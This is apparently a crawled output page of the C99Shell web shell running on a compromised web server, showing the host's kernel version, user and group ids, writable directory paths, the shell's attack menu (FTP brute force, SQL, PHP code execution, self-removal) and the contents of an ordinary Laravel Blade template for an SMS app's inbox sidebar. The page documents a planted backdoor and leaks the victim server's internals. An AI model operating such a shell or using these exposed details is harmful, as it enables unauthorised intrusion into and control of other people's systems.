!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/storage/framework/views/   drwxrwxrwx
Free 28.26 GB of 117.98 GB (23.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     1f88b1bbfaebc5cf094c9fda86329f70.php (1.73 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="card">
    <div class="card-header">
        <h3 class="card-title"><?php echo e(trans('customer.folders')); ?></h3>

        <div class="card-tools">
            <button type="button" class="btn btn-tool" data-card-widget="collapse"><i class="fas fa-minus"></i>
            </button>
        </div>
    </div>
    <div class="card-body p-0">
        <ul class="nav nav-pills flex-column">
            <li class="nav-item active">
                <a href="<?php echo e(route('customer.smsbox.inbox')); ?>" class="nav-link">
                    <i class="fas fa-inbox"></i> <?php echo e(trans('customer.inbox')); ?>

                    <span class="badge bg-primary float-right"><?php echo e(auth('customer')->user()->unread_messages()->count()); ?></span>
                </a>
            </li>
            <li class="nav-item">
                <a href="<?php echo e(route('customer.smsbox.sent')); ?>" class="nav-link">
                    <i class="far fa-envelope"></i> <?php echo e(trans('customer.sent')); ?>

                </a>
            </li>
            <li class="nav-item">
                <a href="<?php echo e(route('customer.smsbox.draft')); ?>" class="nav-link">
                    <i class="far fa-file-alt"></i> <?php echo e(trans('customer.draft')); ?>

                </a>
            </li>
            <li class="nav-item">
                <a href="<?php echo e(route('customer.smsbox.trash')); ?>" class="nav-link">
                    <i class="far fa-trash-alt"></i> <?php echo e(trans('customer.trash')); ?>

                </a>
            </li>
        </ul>
    </div>
    <!-- /.card-body -->
</div>
<?php /**PATH /home/picotech/domains/sms.picotech.app/public_html/resources/views/customer/smsbox/common.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--